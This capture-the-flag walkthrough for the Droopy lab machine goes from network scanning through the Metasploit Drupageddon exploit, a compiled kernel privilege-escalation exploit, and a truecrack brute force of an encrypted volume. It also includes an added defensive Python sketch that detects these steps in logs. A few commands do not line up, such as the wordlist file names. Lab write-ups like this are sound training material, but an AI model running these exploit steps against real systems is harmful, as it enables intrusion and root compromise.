Introduction
In this post, you will learn how to complete the Droopy CTF. This is a very easy challenge; stick with it to the end and I am sure you will be able to crack the box.
If you have any doubts, leave your question on the Discord server.
To download Droopy [Click here]
Aim
There is 1 flag in Droopy and we have to find it.
Hacking Phases in Droopy CTF
- Finding target IP
- Network Scanning (Nmap)
- Identifying Drupal CMS
- Exploiting Drupal CMS (Metasploit)
- Privilege Escalation with Kernel Exploit
- Uploading and Downloading dave.tc from /www/html
- Generate a Dictionary with the help of rockyou.txt
- Brute Force attack on Truecrypt Volume (Truecrack)
- Decrypting File (Veracrypt)
- Capture the Flag
Finding target IP
To find the target IP, run arp-scan -l or netdiscover.
Nmap scan
Run a full port scan with OS and service detection.
nmap -p- -A 192.168.1.4
The scan shows that port 80 is open, so I opened a web browser to view the target.
Identifying Drupal CMS
Head to the target website to have a look at it.
http://192.168.1.4
The website is powered by Drupal, and an exploit is available for Drupal CMS.
Exploiting Drupal CMS (Metasploit)
Open msfconsole and run:
use exploit/multi/http/drupal_drupageddon
set rhost 192.168.1.4
exploit
Wait for the Meterpreter shell to open.
Privilege Escalation with Kernel Exploit
Open another terminal and type searchsploit 3.13.0
Copy this file to your home directory: /usr/share/exploitdb/exploits/linux/local/37292.c
Once you have saved it, go back to the Meterpreter shell and type:
cd /tmp
upload /home/osboxes/37292.c
Once the exploit is uploaded, enter:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
gcc 37292.c -o shell
chmod 777 shell
Execute the exploit:
./shell
id
cd /root
ls
cp dave.tc /var/www/html
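Seen from the defender's side, the steps above leave a recognisable trail in process-execution logs: the web server account opening a pty, compiling C in /tmp, running the result, and a file from /root landing in the web root. The Python sketch below is an added example, not part of the original walkthrough; the "user|cwd|command line" record format, the rule names and the sample records are constructed for illustration.

```python
import posixpath
import shlex

SERVICE_ACCOUNTS = {"www-data", "apache", "nginx"}
COMPILERS = {"gcc", "cc", "clang", "make"}
WORLD_WRITABLE = ("/tmp", "/var/tmp", "/dev/shm")
WEB_ROOT = "/var/www"

# Constructed sample records in an assumed "user|cwd|command line" format.
SAMPLE_LOG = """\
www-data|/var/www/html|php index.php
www-data|/tmp|python -c 'import pty;pty.spawn("/bin/bash")'
www-data|/tmp|gcc 37292.c -o shell
www-data|/tmp|./shell
root|/root|cp dave.tc /var/www/html
alice|/home/alice/src|gcc main.c -o main
"""

def under(path, roots):
    """True if path equals, or lies below, one of the given directories."""
    return any(path == r or path.startswith(r + "/") for r in roots)

def findings(user, cwd, argv):
    """Return the names of the rules one execution record trips."""
    hits = []
    prog = argv[0]
    if user in SERVICE_ACCOUNTS:
        if any("pty.spawn" in arg for arg in argv[1:]):
            hits.append("service-account-pty-upgrade")
        if posixpath.basename(prog) in COMPILERS:
            hits.append("service-account-compiles")
        # A program named with a slash is run by path, not found via $PATH.
        resolved = posixpath.normpath(posixpath.join(cwd, prog))
        if "/" in prog and under(resolved, WORLD_WRITABLE):
            hits.append("service-account-runs-from-tmp")
    dest = posixpath.normpath(posixpath.join(cwd, argv[-1]))
    if prog in ("cp", "mv") and under(cwd, ("/root",)) and under(dest, (WEB_ROOT,)):
        hits.append("root-file-staged-in-web-root")
    return hits

def scan(log):
    """Return (line_number, rule) for every rule hit in the log text."""
    results = []
    for number, line in enumerate(log.splitlines(), 1):
        if not line.strip():
            continue
        user, cwd, command = line.split("|", 2)
        results += [(number, rule) for rule in findings(user, cwd, shlex.split(command))]
    return results
```

Calling scan(SAMPLE_LOG) flags records 2 to 5 and leaves the normal PHP request and the developer's own gcc run alone.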
Uploading and Downloading dave.tc from /www/html
Now open a web browser and enter this URL on the target IP:
http://192.168.1.4/dave.tc
Now save the file dave.tc.
cd /var
ls
cd mail
ls
cd www-data
ls
cat www-data
Generate a Dictionary with the help of rockyou.txt
Generate a dictionary list to crack the dave.tc file; the flag is hidden inside dave.tc.
cat rockyou.txt | grep academy > /root/Desktop/dict.txt
Brute Force attack on Truecrypt Volume (Truecrack)
To crack the password:
truecrack --truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx
The password for the dave.tc file is etonacademy.
Decrypting File (Veracrypt)
To decrypt the file, we use VeraCrypt.
Once the file is decrypted, open it in a terminal.
Capture the Flag
ls -la
cd .secret
ls -la
cd .top
ls -la
cat flag.txt